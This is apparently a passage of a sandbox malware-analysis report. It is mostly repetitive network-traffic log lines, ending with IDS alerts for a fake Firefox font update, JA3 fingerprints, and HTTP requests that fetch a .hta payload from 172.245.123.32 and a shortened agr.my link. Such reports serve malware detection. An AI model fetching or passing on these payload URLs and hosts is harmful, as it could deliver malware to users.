Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: Joe Sandbox ViewIP Address: 147.79.86.93 147.79.86.93
Source: Joe Sandbox ViewIP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox ViewIP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 13.107.246.41:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 13.107.246.41:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficHTTP traffic detected: GET /vJcD8F?&silk=enthusiastic HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: agr.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.32
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /vJcD8F?&silk=enthusiastic HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: agr.myConnection: Keep-Alive
